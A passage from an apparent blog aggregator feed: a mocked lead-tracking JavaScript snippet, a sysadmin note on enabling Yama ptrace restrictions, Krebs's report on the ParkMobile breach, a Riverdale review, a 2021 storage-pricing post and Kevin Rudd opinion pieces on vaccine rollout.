(llelementphone=='ctl00$ctl00$ctl00$ContentPlaceHolderDefault$MasterContentPlaceHolder$txtPhone') || (llelementphone=='curftelephone') || (llelementphone=='form[Telephone]') || (llelementphone=='tx_pilmailform_pi1[text][phone]') || (llelementphone=='ctl00$ctl00$templateMainContent$homeBanners$HomeBannerList$ctrLeads$txt_5_1') || (llelementphone=='ac_daytimeNumber') || (llelementphone=='daytime_phone') || (llelementphone=='r4') || (llelementphone=='ctl00$ContentPlaceHolderBody$Phone') || (llelementphone=='Fld10_label') || (llelementphone=='field333') || (llelementphone=='txtMobile') || (llelementphone=='form_nominator_phonenumber') || (llelementphone=='submitted[phone_no]') || (llelementphone=='submitted[phone]') || (llelementphone=='submitted[5]') || (llelementphone=='submitted[telephone_no]') || (llelementphone=='fields[Contact Phone]') || (llelementphone=='cf2_field_5') || (llelementphone=='a23786') || (llelementphone=='rpr_phone') || (llelementphone=='phone-number') || (llelementphone=='txt_homePhone') || (llelementphone=='your-number') || (llelementphone=='Contact_Phone') || (llelementphone=='ctl00$CPH_body$txtContactnumber') || (llelementphone=='profile_telephone') || (llelementphone=='item_meta[90]' && llfrmid==11823) || (llelementphone=='item_meta[181]' && llfrmid==26416) || (llelementphone=='input_4' && llfrmid==21452) || (llelementphone=='EditableTextField100' && llfrmid==13948) || (llelementphone=='EditableTextField205' && llfrmid==13948) || (llelementphone=='EditableTextField100' && llfrmid==13948) || (llelementphone=='EditableTextField166' && llfrmid==13948) || (llelementphone=='EditableTextField104' && llfrmid==13948) || (llelementphone=='cf2_field_4' && llfrmid==23878) || (llelementphone=='input_4' && llfrmid==24017) || (llelementphone=='cf_field_4' && llfrmid==15876) || (llelementphone=='cf5_field_5' && llfrmid==15876) || (llelementphone=='input_9' && llfrmid==17254) || (llelementphone=='input_2' && llfrmid==22954) || (llelementphone=='input_8' && llfrmid==23756) || (llelementphone=='input_3' && llfrmid==18793) || (llelementphone=='input_6' && llfrmid==24811) || (llelementphone=='input_3' && llfrmid==19880) || (llelementphone=='input_6' && llfrmid==19230) || (llelementphone=='input_3' && llfrmid==24747) || (llelementphone=='input_4' && llfrmid==25897) || (llelementphone=='text-481' && llfrmid==14451) || (llelementphone=='Form7111$formField_7576') || (llelementphone=='Form7168$formField_7673') || (llelementphone=='Form7116$formField_7592') || (llelementphone=='Form7150$formField_7645') || (llelementphone=='Form7153$formField_7655') || (llelementphone=='Form7119$formField_7600') || (llelementphone=='Form7123$formField_7608') || (llelementphone=='Form7161$formField_7665') || (llelementphone=='Form7176$formField_7690') || (llelementphone=='Form7172$formField_7681') || (llelementphone=='Form7113$formField_7584') || (llelementphone=='Form7106$formField_7568') || (llelementphone=='Form7111$formField_7576') || (llelementphone=='Form7136$formField_7628') || (llelementphone=='Form6482$formField_7621') || (llelementphone=='Form6548$formField_6988') || (llelementphone=='submitted[business_phone]') || (llelementphone=='tfa_3' && llfrmid==23388) || (llelementphone=='ContentObjectAttribute_ezsurvey_answer_4455_3633') || (llelementphone=='838ae21c-1f95-488f-a511-135a588a50fb_Phone') || (llelementphone=='plc$lt$zoneContent$pageplaceholder$pageplaceholder$lt$zoneRightContent$contentText$BizFormControl1$Bizform1$ctl00$Telephone$txt1st') || (llelementphone=='plc$lt$zoneContent$pageplaceholder$pageplaceholder$lt$zoneRightContent$contentText$BizFormControl1$Bizform1$ctl00$Telephone') || (llelementphone=='ctl00$ctl00$ctl00$ContentPlaceHolderDefault$ContentAreaPlaceholderMain$ctl02$ContactForm_3$TextBoxTelephone') || (llelementphone=='plc$lt$Content2$pageplaceholder1$pageplaceholder1$lt$Content$BizForm$viewBiz$ctl00$Phone_Number') || (llelementphone=='ctl00$ctl00$ContentPlaceHolder1$cphMainContent$C002$tbTelephone') || (llelementphone=='contact$tbPhoneNumber') || (llelementphone=='crMain$ctl00$txtPhone') || (llelementphone=='ctl00$PrimaryContent$tbPhone') || (llelementphone=='ff_nm_phone[]') || (llelementphone=='q5_phoneNumber5[phone]') || (llelementphone=='TechContactPhone') || (llelementphone=='referral_phone_number') || (llelementphone=='field8418998') || (llelementphone=='ctl00$Content$ctl00$txtPhone') || (llelementphone=='ctl00$PlaceHolderMain$ucContactUs$txtPhone') || (llelementphone=='m_field_id_4' && llfrmid==15091) || (llelementphone=='Field7' && llfrmid==23387) || (llelementphone=='input_4' && llfrmid==22578) || (llelementphone=='input_2' && llfrmid==11241) || (llelementphone=='input_7' && llfrmid==23633) || (llelementphone=='input_7' && llfrmid==22114) || (llelementphone=='input_4' && (llformalyzerURL.indexOf('demo') != -1) && llfrmid==17544) || (llelementphone=='input_4' && (llformalyzerURL.indexOf('contact') != -1) && llfrmid==17544) || (llelementphone=='field_4' && llfrmid==24654) || (llelementphone=='input_6' && llfrmid==24782) || (llelementphone=='input_4' && (llformalyzerURL.indexOf('contact-us') != -1) && llfrmid==16794) || (llelementphone=='input_3' && (llformalyzerURL.indexOf('try-and-buy') != -1) && llfrmid==16794) || (llelementphone=='input_4' && (llformalyzerURL.indexOf('contact-us') != -1) && llfrmid==23842) || (llelementphone=='input_4' && llfrmid==25451) || (llelementphone=='input_5' && llfrmid==24911) || (llelementphone=='input_3' && llfrmid==13417) || (llelementphone=='input_4' && llfrmid==23813) || (llelementphone=='input_4' && llfrmid==21483) || (llelementphone=='input_3' && llfrmid==25396) || (llelementphone=='input_3' && llfrmid==16175) || (llelementphone=='input_7' && llfrmid==25797) || (llelementphone=='input_4' && llfrmid==15650) || (llelementphone=='input_3' && llfrmid==22025) || (llelementphone=='input_3' && llfrmid==14534) || (llelementphone=='input_4' && llfrmid==25216) || (llelementphone=='input_5' && llfrmid==22884) || (llelementphone=='input_6' && llfrmid==25783) || (llelementphone=='text-747' && llfrmid==16324) || (llelementphone=='vfb-42' && llfrmid==24468) || (llelementphone=='vfb-33' && llfrmid==24468) || (llelementphone=='item_meta[57]' && llfrmid==25268) || (llelementphone=='item_meta[78]' && llfrmid==25268) || (llelementphone=='item_meta[85]' && llfrmid==25268) || (llelementphone=='item_meta[154]' && llfrmid==25268) || (llelementphone=='item_meta[220]' && llfrmid==25268) || (llelementphone=='item_meta[240]' && llfrmid==25268) || (llelementphone=='item_meta[286]' && llfrmid==25268) || (llelementphone=='fieldname5' && llfrmid==12535) || (llelementphone=='Question12' && llfrmid==24639) || (llelementphone=='ninja_forms_field_4' && llfrmid==19321) || (llelementphone=='EditableTextField' && llfrmid==15064) || (llelementphone=='form_fields[27]' && llfrmid==22688) || (llelementphone=='ctl00$body$phone') || (llelementphone=='ctl00$MainContent$txtPhone') || (llelementphone=='FreeTrialForm$Phone') || (llelementphone=='text-521ada035aa46') || (llelementphone=='C_BusPhone') || (llelementphone=='ctl00$ctl00$templateMainContent$pageContent$ctrLeads$txt_5_1') || (llelementphone=='ctl00$Modules$ctl00$rptFields$ctl06$1204') || (llelementphone=='ctl00$Modules$ctl00$rptFields$ctl06$1320') || (llelementphone=='ctl00$Modules$ctl00$rptFields$ctl07$1242') || (llelementphone=='ctl00$Modules$ctl00$rptFields$ctl07$1202') || (llelementphone=='ctl00$Modules$ctl00$rptFields$ctl08$1242') || (llelementphone=='ctl00$MainColumnPlaceHolder$uxPhone') || (llelementphone=='ctl00$MainContent$DropZoneTop$columnDisplay$ctl04$controlcolumn$ctl00$WidgetHost$WidgetHost_widget$IDPhone') || (llelementphone=='ctl00$ctl05$txtPhone') || (llelementphone=='ctl00$Modules$ctl00$rptFields$ctl07$1219') || (llelementphone=='LeadGen_ContactForm_33872_m419365:Phone') || (llelementphone=='F02220803') || (llelementphone=='h2c0f') || (llelementphone=='your_phone_number') || (llelementphone=='Question7') || (llelementphone=='Question51') || (llelementphone=='Question59') || (llelementphone=='Question35') || (llelementphone=='Question67') || (llelementphone=='field9740823') || (llelementphone=='message[phone]') || (llelementphone=='dnn$ctr1266$ViewKamakuraRegister$Phone') || (llelementphone=='phone1') || (llelementphone=='inf_field_Phone1') || (llelementphone=='hscontact_phone') || (llelementphone=='data[Contact][phone]') || (llelementphone=='fields[Phone]') || (llelementphone=='contact[PhoneNumber]') || (llelementphone=='phonename3') || (llelementphone=='UserPhone') || (llelementphone=='ctl00$MainBody$txtPhoneTech') || (llelementphone=='Telephone1') || (llelementphone=='PhoneNumber') || (llelementphone=='work_phone') || (llelementphone=='jform[contact_telephone]') || (llelementphone=='form[phone]') || (llelementphone=='RequestAQuote1$txtPhone') || (llelementphone=='06_Phone') || (llelementphone=='txtPhone') || (llelementphone=='field_location[und][0][phone]') || (llelementphone=='your-phone') || (llelementphone=='cmsForms_phone') || (llelementphone=='Txt_phonenumber') || (llelementphone=='businessPhone') || (llelementphone=='boxHomePhone') || (llelementphone=='HomePhone') || (llelementphone=='request-phone') || (llelementphone=='user[phone]') || (llelementphone=='DATA[PHONE]') || (llelementphone=='ctl00$ctl00$ctl00$cphContent$cphContent$cphContent$Phone') || (llelementphone=='ctl00$MainBody$Form1$obj11') || (llelementphone=='LeadGen_ContactForm_90888_m1467651:Phone') || (llelementphone=='Users[work]') || (llelementphone=='Question43') || (llelementphone=='aics_phone') || (llelementphone=='form[workphone]') || (llelementphone=='ctl00$ctl00$ContentPlaceHolder1$cphMainContent$C006$tbTelephone') || (llelementphone=='cntnt01fbrp__47') || (llelementphone=='submitted[phone_number]') || (llelementphone=='flipform_phone') || (llelementphone=='txtPhone') || (llelementphone=='ctl00$ContentPlaceHolder2$txtPhnno') || (llelementphone=='ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder1$mainContentRegion$BizFormControl1$Bizform1$ctl00$Phone') || (llelementphone=='inpPhone') || (llelementphone=='j_phone') || (llelementphone=='m6e81afbrp__53') || (llelementphone=='item_meta[119]') || (llelementphone=='ctl00$ContentPlaceHolder_Content$dataPhone') || (llelementphone=='ctl00$generalContentPlaceHolder$ctrlContactUs$tbPhone') || (llelementphone=='ctl00$ctl00$ctl00$ContentPlaceHolderDefault$ContentPlaceHolder1$Contact_6$txtPhone') || (llelementphone=='ctl00$MainContent$tel') || (llelementphone=='dynform_element_3') || (llelementphone=='telephone_1') || (llelementphone=='cf_phone') || (llelementphone=='Lead_PrimaryPhone') || (llelementphone=='p_lt_zoneContent_wP_wP_lt_zonePageWidgets_RevolabsMicrosoftDynamicsCRMContactForm_1_txtBusinessPhone') || (llelementphone=='si_contact_ex_field2') || (llelementphone=='dnn$ctr458$XModPro$ctl00$ctl00$ctl00$Telephone') || (llelementphone=='ctl00$ctl06$txtTelephone') || (llelementphone=='dnn$ctr458$XModPro$ctl00$ctl00$ctl00$Telephone') || (llelementphone=='ctl00$ctl00$mainCopy$CPHCenter$ctl00$QuickRegControl_2$TBPhone') || (llelementphone=='LeadGen_ContactForm_38163_m457931:Phone') || (llelementphone=='LeadGen_ContactForm_29909_m371524:Phone') || (llelementphone=='LeadGen_ContactForm_32343_m395611:Phone') || (llelementphone=='LeadGen_ContactForm_31530_m388101:Phone') || (llelementphone=='LeadGen_ContactForm_27072_m349818:Phone') || (llelementphone=='LeadGen_ContactForm_28362_m354522:Phone') || (llelementphone=='LeadGen_ContactForm_28759_m358745:Phone') || (llelementphone=='LeadGen_ContactForm_32343_m395611:Phone') || (llelementphone=='LeadGen_ContactForm_33631_m415978:Phone') || (llelementphone=='LeadGen_ContactForm_30695_m380436:Phone') || (llelementphone=='LeadGen_ContactForm_29958_m372138:Phone') || (llelementphone=='LeadGen_ContactForm_31471_m387422:Phone') || (llelementphone=='LeadGen_ContactForm_32514_m397613:Phone') || (llelementphone=='LeadGen_ContactForm_29152_m362772:Phone') || (llelementphone=='LeadGen_ContactForm_32540_m397908:Phone') || (llelementphone=='pNumber') || (llelementphone=='organizer_phone') || (llelementphone=='ctl00$PlaceHolderMain$TrialDownloadForm$Phone') || (llelementphone=='ContactSubmission.Phone.Value') || (llelementphone=='ctl00$body$txtPhone') || (llelementphone=='p$lt$ctl03$pageplaceholder$p$lt$zoneCentre$editabletext$ucEditableText$widget1$ctl00$viewBiz$ctl00$Telephone$textbox') || (llelementphone=='ctl01_ctl00_pbForm1_ctl_phone_61f3') || (llelementphone=='ctl01$ctl00$ContentPlaceHolder1$ctl15$Phone') || (llelementphone=='p$lt$zoneContent$pageplaceholder$p$lt$zoneRightContent$contentText$ucEditableText$BizFormControl1$Bizform1$ctl00$Telephone$textbox') || (llelementphone=='ctl00$ctl00$ContentPlaceHolder$ContentPlaceHolder$ctl00$fPhone') || (llelementphone=='pagecolumns_0$form_B502CC1EC1644B38B722523526D45F36$field_6BCFC01A782747DF8E785B5533850EEB') || (llelementphone=='cf3_field_10') || (llelementphone=='r_phone') || (llelementphone=='c_phone') || (llelementphone=='cf-1[]') || (llelementphone=='frm_phone') || (llelementphone=='Patient_Phone_Number') || (llelementphone=='ctl00$PageContent$ctl00$txtPhone') || (llelementphone=='dnn$ctr398$FormMaster$ctl_6e49bedd138a4684a66b62dcb1a34658') || (llelementphone=='id_tel') || (llelementphone=='field_contact_tel[und][0][value]') || (llelementphone=='Phone:') || (llelementphone=='ContactPhone') || (llelementphone=='submitted[telephone]') || (llelementphone=='ctl00$ContentPlaceHolder1$ctl04$txtPhone') || (llelementphone=='ctl00$ContentPlaceHolder_pageContent$contact_phone') || (llelementphone=='264') || (llelementphone=='form_phone_number') || (llelementphone=='field8418998') || (llelementphone=='phoneTBox') || (llelementphone=='pagecontent_1$content_0$contentbottom_0$txtPhone') || (llelementphone=='application_0$PhoneTextBox') || (llelementphone=='submitted[phone_work]') || (llelementphone=='data[Lead][phone]') || (llelementphone=='a4475-telephone') || (llelementphone=='ctl00$Form$txtPhoneNumber') || (llelementphone=='signup_form_data[Phone]') || (llelementphone=='WorkPhone') || (llelementphone=='lldPhone') || (llelementphone=='web_form_1[field_102]value') || (llelementphone=='LeadGen_ContactForm_114694_m1832700:Phone') || (llelementphone=='phoneSalesForm') || (llelementphone=='fund_phone') || (llelementphone=='Phonepi_Phone') || (llelementphone=='field343') || (llelementphone=='cntnt01fbrp__48') || (llelementphone=='contact[phone]') || (llelementphone=='ctl00_ContentPlaceHolder1_ctl01_contactTelephoneBox_text') || (llelementphone=='ctl01$ctl00$ContentPlaceHolder1$ctl29$Phone') || (llelementphone=='plc$lt$content$pageplaceholder$pageplaceholder$lt$bodyColumnZone$LogilityContactUs$txtWorkPhone') || (llelementphone=='ctl00$ctl00$ctl00$cphBody$cphMain$cphMain$FormBuilder1$FormBuilderListView$ctrl4$FieldControl_Telephone') || (llelementphone=='ctl00$ctl00$ctl00$ContentPlaceHolderDefault$cp_content$ctl02$RenderForm_1$rpFieldsets$ctl00$rpFields$ctl04$126d33a3_9f7f_4583_8c94_5820d58fc030') || (llelementphone=='tx_powermail_pi1[uid1266]') || (llelementphone=='si_contact_ex_field3') || (llelementphone=='inc_contact1$txtPhone') || (llelementphone=='item2_tel_1') || (llelementphone=='LeadGen_ContactForm_15766_m0:Phone') || (llelementphone=='ctl00$ContentPlaceHolder1$txtPhone') || (llelementphone=='Default$Content$FormViewer$FieldsRepeater$ctl04$ctl00$ViewTextBox') || (llelementphone=='Default$Content$FormViewer$FieldsRepeater$ctl04$ctl00$ViewTextBox') || (llelementphone=='ctl00$SecondaryPageContent$C005$ctl00$ctl00$C002$ctl00$ctl00$textBox_write') || (llelementphone=='_u216318653597056311') || (llelementphone=='_u630018292785751084') || (llelementphone=='data[Contact][office_phone]') || (llelementphone=='ctl00$ctl00$cphMainContent$Content$txtPhone') || (llelementphone=='ctl00$ContentPlaceHolder1$txtTel') || (llelementphone=='item_5') || (llelementphone=='ques_21432') || (llelementphone=='phoneNum') || (llelementphone=='CONTACT_PHONE') || (llelementphone=='ff_nm_cf_phonetext[]') || (llelementphone=='WorkPhone') ) ) { llformphone = (document.forms[llformlooper2].elements[llelementlooper].value); if (llfrmid == debugid ) {alert('llformphone:'+llformphone+' llemailfound:'+llemailfound);} }

If the name property of the form element is equal to any one of the many many many items in this list, we can then extract the value and stuff it into a variable. And, since this will almost certainly break all the time, it's got a convenient "set the debugid and I'll spam alerts as I search the form".

Repeat this for every other field. It ends up being almost 2,000 lines of code, just to select the correct fields out of the forms.

[Advertisement] Utilize BuildMaster to release your software with confidence, at the pace your business demands. Download today!



I’ve just setup the Yama LSM module on some of my Linux systems. Yama controls ptrace which is the debugging and tracing API for Unix systems. The aim is to prevent a compromised process from using ptrace to compromise other processes and cause more damage. In most cases a process which can ptrace another process which usually means having capability SYS_PTRACE (IE being root) or having the same UID as the target process can interfere with that process in other ways such as modifying it’s configuration and data files. But even so I think it has the potential for making things more difficult for attackers without making the system more difficult to use.

If you put “kernel.yama.ptrace_scope = 1” in sysctl.conf (or write “1” to /proc/sys/kernel/yama/ptrace_scope) then a user process can only trace it’s child processes. This means that “strace -p” and “gdb -p” will fail when run as non-root but apart from that everything else will work. Generally “strace -p” (tracing the system calls of another process) is of most use to the sysadmin who can do it as root. The command “gdb -p” and variants of it are commonly used by developers so yama wouldn’t be a good thing on a system that is primarily used for software development.

Another option is “kernel.yama.ptrace_scope = 3” which means no-one can trace and it can’t be disabled without a reboot. This could be a good option for production servers that have no need for software development. It wouldn’t work well for a small server where the sysadmin needs to debug everything, but when dozens or hundreds of servers have their configuration rolled out via a provisioning tool this would be a good setting to include.

See Documentation/admin-guide/LSM/Yama.rst in the kernel source for the details.

When running with capability SYS_PTRACE (IE root shell) you can ptrace anything else and if necessary disable Yama by writing “0” to /proc/sys/kernel/yama/ptrace_scope .

I am enabling mode 1 on all my systems because I think it will make things harder for attackers while not making things more difficult for me.

Also note that SE Linux restricts SYS_PTRACE and also restricts cross-domain ptrace access, so the combination with Yama makes things extra difficult for an attacker.

Yama is enabled in the Debian kernels by default so it’s very easy to setup for Debian users, just edit /etc/sysctl.d/whatever.conf and it will be enabled on boot.

Krebs on SecurityParkMobile Breach Exposes License Plate Data, Mobile Numbers of 21M Users

Someone is selling account information for 21 million customers of ParkMobile, a mobile parking app that’s popular in North America. The stolen data includes customer email addresses, dates of birth, phone numbers, license plate numbers, hashed passwords and mailing addresses.

KrebsOnSecurity first heard about the breach from Gemini Advisory, a New York City based threat intelligence firm that keeps a close eye on the cybercrime forums. Gemini shared a new sales thread on a Russian-language crime forum that included my ParkMobile account information in the accompanying screenshot of the stolen data.

Included in the data were my email address and phone number, as well as license plate numbers for four different vehicles we have used over the past decade.

Asked about the sales thread, Atlanta-based ParkMobile said the company published a notification on Mar. 26 about “a cybersecurity incident linked to a vulnerability in a third-party software that we use.”

“In response, we immediately launched an investigation with the assistance of a leading cybersecurity firm to address the incident,” the notice reads. “Out of an abundance of caution, we have also notified the appropriate law enforcement authorities. The investigation is ongoing, and we are limited in the details we can provide at this time.”

The statement continues: “Our investigation indicates that no sensitive data or Payment Card Information, which we encrypt, was affected. Meanwhile, we have taken additional precautionary steps since learning of the incident, including eliminating the third-party vulnerability, maintaining our security, and continuing to monitor our systems.”

Asked for clarification on what the attackers did access, ParkMobile confirmed it included basic account information – license plate numbers, and if provided, email addresses and/or phone numbers, and vehicle nickname.

“In a small percentage of cases, there may be mailing addresses,” spokesman Jeff Perkins said.

ParkMobile doesn’t store user passwords, but rather it stores the output of a fairly robust one-way password hashing algorithm called bcrypt, which is far more resource-intensive and expensive to crack than common alternatives like MD5. The database stolen from ParkMobile and put up for sale includes each user’s bcrypt hash.

“You are correct that bcrypt hashed and salted passwords were obtained,” Perkins said when asked about the screenshot in the database sales thread.

“Note, we do not keep the salt values in our system,” he said. “Additionally, the compromised data does not include parking history, location history, or any other sensitive information. We do not collect social security numbers or driver’s license numbers from our users.”

ParkMobile says it is finalizing an update to its support site confirming the conclusion of its investigation. But I wonder how many of its users were even aware of this security incident. The Mar. 26 security notice does not appear to be linked to other portions of the ParkMobile site, and it is absent from the company’s list of recent press releases.

It’s also curious that ParkMobile hasn’t asked or forced its users to change their passwords as a precautionary measure. I used the ParkMobile app to reset my password, but there was no messaging in the app that suggested this was a timely thing to do.

So if you’re a ParkMobile user, changing your account password might be a pro move. If it’s any consolation, whoever is selling this data is doing so for an insanely high starting price ($125,000) that is unlikely to be paid by any cybercriminal to a new user with no reputation on the forum.

More importantly, if you used your ParkMobile password at any other site tied to the same email address, it’s time to change those credentials as well (and stop re-using passwords).

The breach comes at a tricky time for ParkMobile. On March 9, the European parking group EasyPark announced its plans to acquire the company, which operates in more than 450 cities in North America.

Cory DoctorowHow To Destroy Surveillance Capitalism (Part 02)

This week on my podcast, part two of a serialized reading of my 2020 Onezero/Medium book How To Destroy Surveillance Capitalism, now available in paperback (you can also order signed and personalized copies from Dark Delicacies, my local bookstore).



I’ve been watching the show Riverdale on Netflix recently. It’s an interesting modern take on the Archie comics. Having watched Josie and the Pussycats in Outer Space when I was younger I was anticipating something aimed towards a similar audience. As solving mysteries and crimes was apparently a major theme of the show I anticipated something along similar lines to Scooby Doo, some suspense and some spooky things, but then a happy ending where criminals get arrested and no-one gets hurt or killed while the vast majority of people are nice. Instead the first episode has a teen being murdered and Ms Grundy being obsessed with 15yo boys and sleeping with Archie (who’s supposed to be 15 but played by a 20yo actor).

Everyone in the show has some dark secret. The filming has a dark theme, the sky is usually overcast and it’s generally gloomy. This is a significant contrast to Veronica Mars which has some similarities in having a young cast, a sassy female sleuth, and some similar plot elements. Veronica Mars has a bright theme and a significant comedy element in spite of dealing with some dark issues (murder, rape, child sex abuse, and more). But Riverdale is just dark. Anyone who watches this with their kids expecting something like Scooby Doo is in for a big surprise.

There are lots of interesting stylistic elements in the show. Lots of clothing and uniform designs that seem to date from the 1940’s. It seems like some alternate universe where kids have smartphones and laptops while dressing in the style of the 1940s. One thing that annoyed me was construction workers using tools like sledge-hammers instead of excavators. A society that has smart phones but no earth-moving equipment isn’t plausible.

On the upside there is a racial mix in the show that more accurately reflects American society than the original Archie comics and homophobia is much less common than in most parts of our society. For both race issues and gay/lesbian issues the show treats them in an accurate way (portraying some bigotry) while the main characters aren’t racist or homophobic.

I think it’s generally an OK show and recommend it to people who want a dark show. It’s a good show to watch while doing something on a laptop so you can check Wikipedia for the references to 1940s stuff (like when Bikinis were invented). I’m half way through season 3 which isn’t as good as the first 2, I don’t know if it will get better later in the season or whether I should have stopped after season 2.

I don’t usually review fiction, but the interesting aesthetics of the show made it deserve a review.

MEStorage Trends 2021

The Viability of Small Disks

Less than a year ago I wrote a blog post about storage trends [1]. My main point in that post was that disks smaller than 2TB weren’t viable then and 2TB disks wouldn’t be economically viable in the near future.

Now MSY has 2TB disks for $72 and 2TB SSD for $245, saving $173 if you get a hard drive (compared to saving $240 10 months ago). Given the difference in performance and noise 2TB hard drives won’t be worth using for most applications nowadays.


Last year NVMe prices were very comparable for SSD prices, I was hoping that trend would continue and SSDs would go away. Now for sizes 1TB and smaller NVMe and SSD prices are very similar, but for 2TB the NVMe prices are twice that of SSD – presumably partly due to poor demand for 2TB NVMe. There are also no NVMe devices larger than 2TB on sale at MSY (a store which caters to home stuff not special server equipment) but SSDs go up to 8TB.

It seems that NVMe is only really suitable for workstation storage and for cache etc on a server. So SATA SSDs will be around for a while.

Small Servers

There are a range of low end servers which support a limited number of disks. Dell has 2 disk servers and 4 disk servers. If one of those had 8TB SSDs you could have 8TB of RAID-1 or 24TB of RAID-Z storage in a low end server. That covers the vast majority of servers (small business or workgroup servers tend to have less than 8TB of storage).

Larger Servers

Anandtech has an article on Seagates roadmap to 120TB disks [2]. They currently sell 20TB disks using HAMR technology

Currently the biggest disks that MSY sells are 10TB for $395, which was also the biggest disk they were selling last year. Last year MSY only sold SSDs up to 2TB in size (larger ones were available from other companies at much higher prices), now they sell 8TB SSDs for $949 (4* capacity increase in less than a year). Seagate is planning 30TB disks for 2023, if SSDs continue to increase in capacity by 4* per year we could have 128TB SSDs in 2023. If you needed a server with 100TB of storage then having 2 or 3 SSDs in a RAID array would be much easier to manage and faster than 4*30TB disks in an array.

When you have a server with many disks you can expect to have more disk failures due to vibration. One time I built a server with 18 disks and took disks from 2 smaller servers that had 4 and 5 disks. The 9 disks which had been working reliably for years started having problems within weeks of running in the bigger server. This is one of the many reasons for paying extra for SSD storage.

Seagate is apparently planning 50TB disks for 2026 and 100TB disks for 2030. If that’s the best they can do then SSD vendors should be able to sell larger products sooner at prices that are competitive. Matching hard drive prices is not required, getting to less than 4* the price should be enough for most customers.

The Anandtech article is worth reading, it mentions some interesting features that Seagate are developing such as having 2 actuators (which they call Mach.2) so the drive can access 2 different tracks at the same time. That can double the performance of a disk, but that doesn’t change things much when SSDs are more than 100* faster. Presumably the Mach.2 disks will be SAS and incredibly expensive while providing significantly less performance than affordable SATA SSDs.

Computer Cases

In my last post I speculated on the appearance of smaller cases designed to not have DVD drives or 3.5″ hard drives. Such cases still haven’t appeared apart from special purpose machines like the NUC that were available last year.

It would be nice if we could get a new industry standard for smaller power supplies. Currently power supplies are expected to be almost 5 inches wide (due to the expectation of a 5.25″ DVD drive mounted horizontally). We need some industry standards for smaller PCs that aren’t like the NUC, the NUC is very nice, but most people who build their own PC need more space than that. I still think that planning on USB DVD drives is the right way to go. I’ve got 4PCs in my home that are regularly used and CDs and DVDs are used so rarely that sharing a single DVD drive among all 4 wouldn’t be a problem.


I’m tempted to get a couple of 4TB SSDs for my home server which cost $487 each, it currently has 2*500G SSDs and 3*4TB disks. I would have to remove some unused files but that’s probably not too hard to do as I have lots of old backups etc on there. Another possibility is to use 2*4TB SSDs for most stuff and 2*4TB disks for backups.

I’m recommending that all my clients only use SSDs for their storage. I only have one client with enough storage that disks are the only option (100TB of storage) but they moved all the functions of that server to AWS and use S3 for the storage. Now I don’t have any clients doing anything with storage that can’t be done in a better way on SSD for a price difference that’s easy for them to afford.

Affordable SSD also makes RAID-1 in workstations more viable. 2 disks in a PC is noisy if you have an office full of them and produces enough waste heat to be a reliability issue (most people don’t cool their offices adequately on weekends). 2 SSDs in a PC is no problem at all. As 500G SSDs are available for $73 it’s not a significant cost to install 2 of them in every PC in the office (more cost for my time than hardware). I generally won’t recommend that hard drives be replaced with SSDs in systems that are working well. But if a machine runs out of space then replacing it with SSDs in a RAID-1 is a good choice.

Moore’s law might cover SSDs, but it definitely doesn’t cover hard drives. Hard drives have fallen way behind developments of most other parts of computers over the last 30 years, hopefully they will go away soon.

Kevin RuddBBC Breakfast: HRH Prince Philip

12 APRIL 2021

The post BBC Breakfast: HRH Prince Philip appeared first on Kevin Rudd.

Kevin RuddThe Guardian: Australia’s vaccination rollout strategy has been an epic fail. Now Scott Morrison is trying to gaslight us

Australians should be proud of their success in suppressing and eliminating coronavirus so far. This is largely due to the efforts of state governments – Labor and Liberal – in containing local outbreaks through a combination of mandatory quarantines, temporary lockdowns and effective contact tracing. And the Australian people themselves have played the biggest part by making this strategy of containment, and eventual elimination, work.

The same cannot be said of the federal government’s vaccination strategy where they have politically trumpeted their success. The daily reality of the vaccination rollout strategy reveals a litany of policy and administrative failures.

Thirteen months into the Covid-19 crisis, the states collectively get a strong B-plus on virus containment; whereas the federal government gets a D-minus on its vaccine rollout.

With the states constitutionally responsible for most of the public health response, Scott Morrison’s main role was: to secure in advance sufficient international and domestic vaccine supply; to do so from multiple vaccine developers to mitigate against the risks of individual vaccines failing; and to organise in advance a distribution strategy that would get the vaccine to the people as rapidly as possible.

On this core responsibility, Morrison has failed. His strategy, once again, is a political strategy. It has been to blame others – the states on delivery and the Europeans on supply.

Ultimately, the delivery of an effective vaccine to the people is the only effective long-term guarantee on a return to public health normality – and therefore economic normality, including the opening of our international borders.

We are now in a race against time to immunise our population, overcome this virus, and start the task of rebuilding from the pandemic. However, five months after Morrison announced Australians were “at the front of the queue” for vaccination, our rollout is presently ranked 104th in the world – sandwiched between Lebanon and Bangladesh – based on the latest seven-day average vaccination rate. This is a national disgrace.

Australians understand this is a race. It is a race between our vaccination rollout to eliminate the virus from our shores, and the rolling risk of the virus mutating. We are reminded of this every time the virus leaks out of hotel quarantine, and whenever we read heart-wrenching stories out of India or Brazil. We understand it when we learn about deadlier and more infectious variants emerging overseas that threaten not only those countries, but the roughly 36,000 stranded Australians who are still trickling home months too late. Each extra day they spend waiting for a quarantine place is another day they risk being exposed to a new variant they could bring back to Australia.

At present, we do not know when all Australians will be vaccinated against Covid-19. We don’t even know when all of our frontline doctors, nurses and quarantine workers will be vaccinated.

Early warnings that Australia should diversify its vaccine portfolio and avoid putting too many eggs in the AstraZeneca basket have been proven right.

And despite the prime minister telling us he has “secured” more Pfizer vaccines, to be delivered sometime around Christmas, the truth is no shipment is truly secure until it is arrived and ready for use.

The truth is we now have no vaccine strategy for half the country this year. Many countries will probably finish rolling out their vaccines before millions of us even get our first shot.

The early perceived political “successes” in Australia’s handling of the virus appears to have induced on Morrison’s part a breathtaking level of political complacency on vaccination strategy that borders on professional negligence. Morrison’s inner circle seem to inhabit an alternate reality. The key decision-makers (many of whom, it seems, have already been vaccinated) insist there is no race at all.

Despite earlier doubling down on unrealistic targets, Morrison now tries to gaslight Australians by claiming he didn’t actually say what we all heard him say. That we would be at the “front of the queue”, that we had access to the best vaccines in the world, and that we would have four million vaccinations done by the end of March. All bullshit.

So what could the prime minister now do? First, Morrison should own up to his responsibilities. Doctors can give excellent medical advice, but they aren’t necessarily experienced at public sector management, international diplomacy or working out how and when vaccines will be delivered to surgeries. Morrison’s job is to ensure that his health bureaucracy has a clear, workable communications plan with the nation’s medical workforce on vaccine distribution.

At the same time, Morrison should recognise that his own hyperactive political messaging is actually eroding the public’s confidence rather than boosting it.

One lesson from the pandemic’s first wave was that many Australians felt far more reassured by straight-talkers than evasive ministers and officials. Public confidence in the vaccination program isn’t eroded by people asking reasonable questions, but by the failure of governments to give straight and factual answers. Morrison and his officials could inspire more confidence if they were less shifty, more candid or simply vacated the public communications space entirely to the chief medical officer.

